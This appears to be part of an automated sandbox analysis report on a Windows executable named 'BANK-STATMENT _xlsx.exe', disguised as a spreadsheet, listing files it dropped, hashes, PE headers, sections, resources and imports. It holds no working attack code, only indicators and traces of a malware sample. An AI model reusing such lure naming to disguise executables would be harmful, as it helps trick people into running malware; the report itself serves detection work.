                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="735853" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB64.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):5692
                                                                              Entropy (8bit):3.7362665521032725
                                                                              Encrypted:false
                                                                              SSDEEP:96:RtIU6o7r3GLt3idP6ccbYZHuvUubSfOyWggwB+aM1UDI1fYBGm:Rrl7r3GLNidP6ccbYZHuvUubS/+p1UDh
                                                                              MD5:017FD89E3734E63FACECEBC9D6C71C99
                                                                              SHA1:198175B96A6310BC6F2EC8B944FA855D55D07664
                                                                              SHA-256:58BCDD3A8523766D70B9B7601D1CBE9C1BE53F02873EEC64F8C60444E82F1CDB
                                                                              SHA-512:CD7AF9624B643E9810A0856D0BFB095EBCDCBFC4D7A65AE63054B4AE54A469CB44E79266968B461FC11C7773B9D76AC49BB1FD5E1FADEE46E730D28AA60F2C6E
                                                                              Malicious:false
                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.8.0.<./.P.i.d.>.......
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC01.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.476622485131769
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zszJgtWI9sqWSC8BG8fm8M4JFKA7Fo+q8v9ocv4H+d:uITfNfLSNZJFKpKCcvg+d
                                                                              MD5:55661D3A5A477629000B09FD2C3C93D3
                                                                              SHA1:A1CCD794CA275B2EE5D5838C2DE3E9D9D710AC2D
                                                                              SHA-256:0A1564FA4EBFCC9E226BAE441CDF3F28C45BFA00819361EBE641834A4EC7E0A6
                                                                              SHA-512:A60C6204867768D8DBF69B414C649696D4C028299ACB064C99A71C23CA5AEFC51E66CA3A666BD2586EBDD4E5565E2BF3C7E09921C8A623C69DD9534D9B12406C
                                                                              Malicious:false
                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="735855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0FB.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):5692
                                                                              Entropy (8bit):3.7361337278264863
                                                                              Encrypted:false
                                                                              SSDEEP:96:RtIU6o7r3GLt3iiR6U9cEIXDkYZHuvUubSfOyWggwB+aM1uc1fEXam:Rrl7r3GLNiiR69rzkYZHuvUubS/+p1uj
                                                                              MD5:282364D123559D1559F1BE3C7CE12993
                                                                              SHA1:1900116F8645DD67581E3A3E880588384FA5C3A9
                                                                              SHA-256:A8FA38E71D604414E4ABF48AF5479B672B5613A273F9E56F06C2FB369DA8F7C7
                                                                              SHA-512:8087299D86A418356FD8E61D76688562A136D3ED384136B1F6900A865D3555FBA0036E12B9BF045A2F762ADCC71DD1E479557DBA86177DF6B58E8C95C59CD8AF
                                                                              Malicious:false
                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.8.0.<./.P.i.d.>.......
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1C7.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.476286019433985
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zszJgtWI9sqWSC8BE8fm8M4JFKA7Fk+q8v9+cv4Hdd:uITfNfLSNHJFKZKAcvgdd
                                                                              MD5:9E3FCD004985DFA030F0F51B1AB27043
                                                                              SHA1:CDB35AD87D4306A2461EAE7D41BE6F62577E9B07
                                                                              SHA-256:73BE6578D438CAEBB83EB34868719FC42AB31EA1C82BE191CAE33BD0B0CFC22E
                                                                              SHA-512:619345A0AC68CB08AC5201B8E75E6F95288B7CE6ACF06A4084F3EC3ED996CDF71828211B0E6C20263C86C6F75BB5F4FAF6B7F02E314D9EF5C788C110F89607C6
                                                                              Malicious:false
                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="735855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Preview: ..
                                                                              C:\Users\user\AppData\Roaming\pid.txt
                                                                              Process:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):2.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:BR:n
                                                                              MD5:EF0D17B3BDB4EE2AA741BA28C7255C53
                                                                              SHA1:E3479C19053568CE27FCC573669D61191419B296
                                                                              SHA-256:CF5DF267131383187BDB3D2C59A8718E37AC3103AE6612E9EE5FD113A75116E9
                                                                              SHA-512:FD2595FEEB081D9BC1938F59C4F641B895DABD0AD71987F0CA5E278666714B866B4BCC4DDEB8056D1280292C09B82022B9E01C4448B63FF2A8CE9A0C17064BAA
                                                                              Malicious:false
                                                                              Preview: 2864
                                                                              C:\Users\user\AppData\Roaming\pidloc.txt
                                                                              Process:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):46
                                                                              Entropy (8bit):4.50771291359613
                                                                              Encrypted:false
                                                                              SSDEEP:3:oNt+WfWna2ivf6+J:oNwva7jJ
                                                                              MD5:17A331B7B14347C9BF55C859D564272C
                                                                              SHA1:44A7FB06E7DC2D59BDADBA10D88E936BAF85C9ED
                                                                              SHA-256:714BF368D097C449B0C4A831E70AAF6C077860B7B2FFF3BD68687879F2C73D8E
                                                                              SHA-512:A5AE156BBE52F34AA62C31BAA5B8A4A8CA893E36A843D7862B0039101781757AD242C0A6998AAF58491ACE8316C071579CEAB1623163B473F27BEB78F074869D
                                                                              Malicious:false
                                                                              Preview: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.9327470610312085
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                              • InstallShield setup (43055/19) 0.43%
                                                                              • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                              File name:BANK-STATMENT _xlsx.exe
                                                                              File size:965120
                                                                              MD5:debe564cd4c27c02d23c828df27fe27f
                                                                              SHA1:1b55fba242460cc0a5b38299acaaacf3f54c5e87
                                                                              SHA256:edafe7e62738e180cb882d93f37d2d306627aef482d6f7a7a06c69198c61cd58
                                                                              SHA512:07091b073d5885787f830a6a02a39f1064a80767ac02aea87bbc66ccb93406fba2f7a7bdd9d02d4c04f18b54bb59b34d0fd3e97649584363008c56b126801c37
                                                                              SSDEEP:24576:6odaqxzLqAc4TDlEO9KqOidDy70cd4gKsvi:Rj1uVmhpOidDyv1Ksa
                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:be9eeecece709286

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x46add0
                                                                              Entrypoint Section:CODE
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:dfbd2d8adc9d5f58fb80cc271c1cf580

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              add esp, FFFFFFF0h
                                                                              mov eax, 0046AC20h
                                                                              call 00007F6BE4B3C7C9h
                                                                              mov eax, dword ptr [00486C60h]
                                                                              mov eax, dword ptr [eax]
                                                                              call 00007F6BE4B8B5D1h
                                                                              mov ecx, dword ptr [00486D50h]
                                                                              mov eax, dword ptr [00486C60h]
                                                                              mov eax, dword ptr [eax]
                                                                              mov edx, dword ptr [0046A72Ch]
                                                                              call 00007F6BE4B8B5D1h
                                                                              mov eax, dword ptr [00486C60h]
                                                                              mov eax, dword ptr [eax]
                                                                              call 00007F6BE4B8B645h
                                                                              call 00007F6BE4B3A2C0h
                                                                              lea eax, dword ptr [eax+00h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x880000x247a.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x950000x5bc5c.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8d0000x7044.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x8c0000x18.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              CODE0x10000x69e180x6a000False0.524259747199data6.51526332301IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              DATA0x6b0000x1bddc0x1be00False0.171822449552data2.72180144261IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              BSS0x870000xc790x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .idata0x880000x247a0x2600False0.350637335526data4.93470816555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .tls0x8b0000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x8c0000x180x200False0.048828125data0.20058190744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              .reloc0x8d0000x70440x7200False0.581483004386data6.62684722592IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x950000x5bc5c0x5be00False0.887537202381data7.51848710017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_CURSOR0x962500x134data
                                                                              RT_CURSOR0x963840x134data
                                                                              RT_CURSOR0x964b80x134data
                                                                              RT_CURSOR0x965ec0x134data
                                                                              RT_CURSOR0x967200x134data
                                                                              RT_CURSOR0x968540x134data
                                                                              RT_CURSOR0x969880x134data
                                                                              RT_BITMAP0x96abc0x1d0data
                                                                              RT_BITMAP0x96c8c0x1e4data
                                                                              RT_BITMAP0x96e700x1d0data
                                                                              RT_BITMAP0x970400x1d0data
                                                                              RT_BITMAP0x972100x1d0data
                                                                              RT_BITMAP0x973e00x1d0data
                                                                              RT_BITMAP0x975b00x1d0data
                                                                              RT_BITMAP0x977800x1d0data
                                                                              RT_BITMAP0x979500x53c6edataEnglishUnited States
                                                                              RT_BITMAP0xeb5c00x1d0data
                                                                              RT_BITMAP0xeb7900xd8data
                                                                              RT_BITMAP0xeb8680x128data
                                                                              RT_BITMAP0xeb9900x128data
                                                                              RT_BITMAP0xebab80x128data
                                                                              RT_BITMAP0xebbe00xe8data
                                                                              RT_BITMAP0xebcc80x128data
                                                                              RT_BITMAP0xebdf00x128data
                                                                              RT_BITMAP0xebf180xd0data
                                                                              RT_BITMAP0xebfe80x128data
                                                                              RT_BITMAP0xec1100x128data
                                                                              RT_BITMAP0xec2380x128data
                                                                              RT_BITMAP0xec3600x128data
                                                                              RT_BITMAP0xec4880x128data
                                                                              RT_BITMAP0xec5b00xe8data
                                                                              RT_BITMAP0xec6980x128data
                                                                              RT_BITMAP0xec7c00x128data
                                                                              RT_BITMAP0xec8e80xd0data
                                                                              RT_BITMAP0xec9b80x128data
                                                                              RT_BITMAP0xecae00x128data
                                                                              RT_BITMAP0xecc080x128data
                                                                              RT_BITMAP0xecd300x128data
                                                                              RT_BITMAP0xece580x128data
                                                                              RT_BITMAP0xecf800xe8data
                                                                              RT_BITMAP0xed0680x128data
                                                                              RT_BITMAP0xed1900x128data
                                                                              RT_BITMAP0xed2b80xd0data
                                                                              RT_BITMAP0xed3880x128data
                                                                              RT_BITMAP0xed4b00x128data
                                                                              RT_BITMAP0xed5d80xd8data
                                                                              RT_BITMAP0xed6b00xd8data
                                                                              RT_BITMAP0xed7880xd8data
                                                                              RT_BITMAP0xed8600xd8data
                                                                              RT_ICON0xed9380x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                              RT_STRING0xedea00xdcdata
                                                                              RT_STRING0xedf7c0x2d8data
                                                                              RT_STRING0xee2540xd8data
                                                                              RT_STRING0xee32c0x160data
                                                                              RT_STRING0xee48c0x218data
                                                                              RT_STRING0xee6a40x470data
                                                                              RT_STRING0xeeb140x380data
                                                                              RT_STRING0xeee940x394data
                                                                              RT_STRING0xef2280x418data
                                                                              RT_STRING0xef6400xf4data
                                                                              RT_STRING0xef7340xc4data
                                                                              RT_STRING0xef7f80x2e0data
                                                                              RT_STRING0xefad80x35cdata
                                                                              RT_STRING0xefe340x2b4data
                                                                              RT_RCDATA0xf00e80x10data
                                                                              RT_RCDATA0xf00f80x224data
                                                                              RT_RCDATA0xf031c0x807Delphi compiled form 'TForm1'
                                                                              RT_GROUP_CURSOR0xf0b240x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b380x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b4c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b600x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b740x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b880x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_CURSOR0xf0b9c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                              RT_GROUP_ICON0xf0bb00x14dataEnglishUnited States
                                                                              RT_HTML0xf0bc40x98dataEnglishUnited States

                                                                              Imports

                                                                              DLLImport
                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                              kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
